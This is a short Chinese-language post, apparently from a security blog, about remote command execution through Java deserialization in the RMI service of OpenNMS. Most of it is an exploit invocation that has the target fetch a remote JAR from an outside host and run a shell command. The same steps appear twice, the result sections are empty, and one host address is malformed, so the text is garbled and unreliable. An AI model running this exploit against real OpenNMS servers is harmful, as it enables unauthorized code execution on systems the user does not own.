OpenNMS Java反序列化命令执行(RMI服务远程命令执行)
测试方法如下:
上传ErrorBaseExec.jar到自己服务器WEB目录,然后执行以下命令:
java -jar RMIexploit.jar 123.123.123.123 1099 http://1.1.1.1.1/ErrorBaseExec.jar "ls -l"
测试结果如下:
测试方法如下:
上传ErrorBaseExec.jar到自己服务器WEB目录,然后执行以下命令:
java -jar RMIexploit.jar 123.123.123.123 1099 http://1.1.1.1.1/ErrorBaseExec.jar "ls -l"
测试结果如下:
OpenNMS Java反序列化命令执行(RMI服务远程命令执行):等您坐沙发呢!